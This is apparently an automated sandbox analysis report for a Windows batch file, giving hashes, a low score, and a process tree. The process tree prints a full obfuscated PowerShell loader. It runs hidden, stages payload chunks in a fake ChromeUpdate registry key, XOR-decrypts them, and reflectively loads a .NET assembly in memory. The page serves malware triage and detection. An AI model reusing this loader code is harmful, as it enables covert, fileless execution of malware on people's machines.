Overview

overview

10

Static

static

1

a.cmd

windows7-x64

1

a.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    15s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2025 23:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a.cmd

  • Size

    4.2MB

  • MD5

    8e53db2a2b188768e4c23344be407467

  • SHA1

    99dd0a15c342904542a6f2f0b9eed3a8c68aff68

  • SHA256

    bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2

  • SHA512

    d7533b52cd188b2f62ea35c0c7774fb5e5d1c824ac96221d8d32a8a73a4f4e29f73ef5cfb968e76def16c2c32f4a35ea6422e3945b9b2d6eb21809ec18a389b6

  • SSDEEP

    49152:bXMw/hbcpR1DHQJLN+Z/8AEUCm5feXp8dv6Hkn1uX+OiqK67KFly6TteW5SEVAAl:G

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\a.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 + 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"
      2⤵
        PID:2700

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads